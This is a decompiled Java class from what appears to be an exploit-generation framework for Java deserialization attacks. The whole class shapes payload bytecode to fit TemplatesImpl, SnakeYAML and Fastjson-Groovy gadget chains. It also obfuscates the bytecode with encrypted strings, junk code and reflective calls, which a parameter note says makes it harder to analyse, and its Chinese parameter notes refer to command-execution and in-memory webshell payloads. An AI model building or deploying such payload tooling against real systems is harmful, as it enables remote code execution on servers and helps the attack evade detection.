package com.ar3h.chains.gadget.impl.bytecode.convert;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.common.util.FileHelper;
import com.ar3h.chains.common.util.JavassistHelper;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javax.validation.constraints.Max;
import javax.validation.constraints.Min;
import me.n1ar4.clazz.obfuscator.api.ClassObf;
import me.n1ar4.clazz.obfuscator.api.Result;
import me.n1ar4.clazz.obfuscator.config.BaseConfig;
import oracle.jdbc.internal.OracleConnection;
import oracle.ucp.common.Clock;
import org.apache.xalan.xsltc.compiler.Constants;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

@GadgetAnnotation(name = "处理字节码", description = "对字节码进行处理，比如修改类名、实现特定接口、插入特定函数以及字节码混淆\n内置 https://github.com/jar-analyzer/class-obf v1.5.0 字节码混淆", authors = {Authors._4ra1n, Authors.Ar3h})
@GadgetTags(tags = {Tag.BytecodeConvertTag}, nextTags = {Tag.Bytecode})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/bytecode/convert/BytecodeConvert.class */
public class BytecodeConvert implements Gadget {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) BytecodeConvert.class);
    public String realClassName;
    public JavassistHelper javassistHelper;
    public GadgetContext gadgetContext;

    @Param(name = "类名", description = "可手动指定类名，random 为随机类名")
    public String className = "random";

    @Param(name = "去除字节码符号信息", description = "去除源码文件名、源码行号、局部变量名等信息,建议开启", type = ParamType.Boolean)
    public Boolean shrink = true;

    @Param(name = "TemplatesImpl利用链", description = "字节码实现 AbstractTranslet 接口\n此项会根据利用链子上下文自动设置该选项, 无需手动设置", type = ParamType.Boolean)
    public Boolean needAbstractTranslet = false;

    @Param(name = "使用jdk中的AbstractTranslet类", description = "true: jdk默认存在的类 com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet\nfalse: apache包下的类 org.apache.xalan.xsltc.runtime.AbstractTranslet\n需手动选择", type = ParamType.Boolean)
    public String useJdkAT = "true";

    @Max(Clock.GRANULARITY)
    @Param(name = "字节码版本", description = "JDK 8 = 52\nJDK 7 = 51\nJDK 6 = 50\nJDK 5 = 49\n46 可以正常执行简单执行命令字节码，但是某些注入内存马情况下报java.class.Verify错误\n推荐 JDK 6 版本(50)", type = ParamType.Integer)
    @Min(45)
    public String version = OracleConnection.CONNECTION_PROPERTY_JAVANET_MSGQ_KERNELWAIT_DEFAULT;
    public boolean snakeyaml = false;

    /* renamed from: groovy, reason: collision with root package name */
    public boolean f34groovy = false;
    public boolean javaWrapper = false;
    public boolean charsetWrapper = false;

    @Param(name = "静态main函数", description = "字节码额外添加 public static void main(String[] argv) {} 方法并调用字节码中的无参构造方法\n需手动设置", type = ParamType.Boolean)
    public boolean addMainFunc = false;

    @Param(name = "[ClassObf] 字节码混淆主开关", description = "调用 class-obf 项目实现字节码混淆\n手动开启后才会使用 ClassObf 对字节码进行混淆", type = ParamType.Boolean)
    public boolean classObfSwitch = false;
    public boolean enableHideField = false;
    public boolean enableHideMethod = false;

    @Param(name = "[ClassObf] 开启 ASM 对 COMPUTE_FRAMES 自动计算", description = "启动 JAVA ASM 的 COMPUTE_FRAMES/MAX 自动计算\n如果遇到 TYPE * NOT PRESENT 报错可以尝试设置该选项为 false", type = ParamType.Boolean)
    public boolean asmAutoCompute = true;
    public boolean enableAdvanceString = true;
    public boolean enableFieldName = true;
    public boolean enableXOR = true;
    public boolean enableAES = true;
    public String aesKey = "OBF_DEFAULT_KEYS";
    public String aesKeyField = "iiiLLLi1i";
    public String aesDecName = "iiLLiLi";

    @Param(name = "[ClassObf] 删除编译信息", type = ParamType.Boolean)
    public boolean enableDeleteCompileInfo = true;
    public boolean enableParamName = true;
    public boolean enableMethodName = true;

    @Param(name = "[ClassObf] 跳过 public 方法混淆", type = ParamType.Boolean)
    public boolean ignorePublic = false;
    public boolean enableJunk = true;
    public int junkLevel = 3;
    public int maxJunkOneClass = 1000;

    @Param(name = "[ClassObf] 将 JVM INVOKE 指令改成反射调用", description = "开启 INVOKEVIRTUAL、INVOKESTATIC、INVOKESPECIAL、INVOKEINTERFACE 转换\n注意：该功能会明显影响执行效率\n优点：经过该混淆后会更加难以分析\n缺点：该功能未经过完善测试不稳定", type = ParamType.Boolean)
    public boolean enableReflect = false;
    public String obfuscateChars = "i,l,L,1,I";
    public String advanceStringName = "ME_N1AR4_CLAZZ_OBF_PROJECT";

    @Param(name = "[ClassObf] 全局方法黑名单", description = "在黑名单内的方法名不进行混淆，使用逗号分隔")
    public String methodBlackList = "main,testMethod1";
    public boolean debug = false;
    public Class templatesImpl = TemplatesImpl.class;
    public Class abstractTranslet = AbstractTranslet.class;
    public Class transformerFactoryImpl = TransformerFactoryImpl.class;

    public void commonJavassist() throws Exception {
        if (this.needAbstractTranslet.booleanValue()) {
            this.javassistHelper.handleTemplatesImpl(this.abstractTranslet);
            log.info("handle AbstractTranslet: set super class AbstractTranslet");
        }
        if (this.snakeyaml) {
            this.javassistHelper.handleSnakeYamlScriptEngineFactory();
            log.info("handle SnakeYaml: implement interface ScriptEngineFactory");
        }
        if (this.f34groovy) {
            this.javassistHelper.handleFastjsonGroovyASTTransformation();
            log.info("handle Fastjson Groovy: implement interface ASTTransformation");
        }
        this.javassistHelper.setClassName(this.realClassName);
        if (this.javaWrapper) {
            this.javassistHelper.handleJavaWrapper();
            log.info("handle JavaWrapper: add method 'public static void _main(String[] argv)'");
        }
        if (this.addMainFunc) {
            this.javassistHelper.handleMainFunction();
            log.info("handle MainFunction: add method 'public static void main(String[] argv)'");
        }
        if (this.charsetWrapper) {
            this.javassistHelper.handleCharsetWrapper();
            log.info("handle CharsetWrapper");
        }
        this.javassistHelper.setVersion(Integer.parseInt(this.version));
        log.debug("set bytecode class name: {}", this.realClassName);
        log.debug("set bytecode version: {}", this.version);
        if (this.shrink.booleanValue()) {
            this.javassistHelper.setCompress(true);
            this.javassistHelper.shrinkBytes();
        }
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        this.gadgetContext = gadgetContext;
        initTemplatesClazz();
        Object obj = gadgetContext.get(ContextTag.NEED_ABSTRACTTRANSLATE_KET);
        if (obj != null) {
            this.needAbstractTranslet = Boolean.valueOf(((Boolean) obj).booleanValue());
        }
        if (this.className == null || "".equals(this.className) || "random".equals(this.className)) {
            this.realClassName = FileHelper.getRandomClassName();
        } else {
            this.realClassName = this.className;
        }
        Object obj2 = gadgetContext.get(ContextTag.JAVA_WRAPPER_KEY);
        if (obj2 != null) {
            this.javaWrapper = ((Boolean) obj2).booleanValue();
        }
        Object obj3 = gadgetContext.get(ContextTag.SNAKEYAML_JAR_KEY);
        if (obj3 != null) {
            this.snakeyaml = ((Boolean) obj3).booleanValue();
        }
        Object obj4 = gadgetContext.get(ContextTag.Groovy_JAR_KEY);
        if (obj4 != null) {
            this.f34groovy = ((Boolean) obj4).booleanValue();
        }
        Object obj5 = gadgetContext.get(ContextTag.CHARSET_WRAPPER_KEY);
        if (obj5 != null) {
            this.charsetWrapper = ((Boolean) obj5).booleanValue();
        }
        gadgetContext.put(getClass().getSimpleName() + ".className", this.realClassName);
        gadgetContext.put(ContextTag.CLASS_NAME_KEY, this.realClassName);
        this.javassistHelper = new JavassistHelper((byte[]) gadgetChain.doCreate(gadgetContext));
        commonJavassist();
        byte[] bytecode = this.javassistHelper.getBytecode();
        if (this.classObfSwitch) {
            log.info("Using ClassObf...");
            BaseConfig baseConfig = new BaseConfig();
            baseConfig.setQuiet(!this.debug);
            baseConfig.setLogLevel("info");
            baseConfig.setEnableHideField(this.enableHideField);
            baseConfig.setEnableHideMethod(this.enableHideMethod);
            baseConfig.setAsmAutoCompute(this.asmAutoCompute);
            baseConfig.setEnableAES(this.enableAES);
            baseConfig.setAesKey(this.aesKey);
            baseConfig.setAesKeyField(this.aesKeyField);
            baseConfig.setAesDecName(this.aesDecName);
            baseConfig.setEnableAdvanceString(this.enableAdvanceString);
            baseConfig.setEnableFieldName(this.enableFieldName);
            baseConfig.setEnableXOR(this.enableXOR);
            baseConfig.setEnableDeleteCompileInfo(this.enableDeleteCompileInfo);
            baseConfig.setEnableParamName(this.enableParamName);
            baseConfig.setEnableMethodName(this.enableMethodName);
            baseConfig.setEnableJunk(this.enableJunk);
            baseConfig.setJunkLevel(this.junkLevel);
            baseConfig.setMaxJunkOneClass(this.maxJunkOneClass);
            baseConfig.setEnableReflect(this.enableReflect);
            baseConfig.setEnableReflectVirtual(this.enableReflect);
            baseConfig.setEnableReflectStatic(this.enableReflect);
            baseConfig.setEnableReflectSpecial(this.enableReflect);
            baseConfig.setEnableReflectInterface(this.enableReflect);
            baseConfig.setObfuscateChars(this.obfuscateChars.split(","));
            baseConfig.setAdvanceStringName(this.advanceStringName);
            baseConfig.setMethodBlackList(this.methodBlackList.split(","));
            baseConfig.setIgnorePublic(this.ignorePublic);
            Result run = new ClassObf(baseConfig).run(bytecode);
            if (run.getMessage().equals("success")) {
                bytecode = run.getData();
            } else {
                log.error("invoke ClassObf error");
            }
        }
        return bytecode;
    }

    private void initTemplatesClazz() throws ClassNotFoundException {
        if (Boolean.parseBoolean(this.useJdkAT)) {
            this.templatesImpl = TemplatesImpl.class;
            this.abstractTranslet = AbstractTranslet.class;
            this.transformerFactoryImpl = TransformerFactoryImpl.class;
        } else {
            this.templatesImpl = Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl");
            this.abstractTranslet = Class.forName(Constants.TRANSLET_CLASS);
            this.transformerFactoryImpl = Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl");
        }
        this.gadgetContext.put(ContextTag.TEMPLATESIMPL_CLASS, this.templatesImpl);
        this.gadgetContext.put(ContextTag.ABSTRACTTRANSLET_CLASS, this.abstractTranslet);
        this.gadgetContext.put(ContextTag.TRANSFORMERFACTORYIMPL_CLASS, this.transformerFactoryImpl);
    }
}
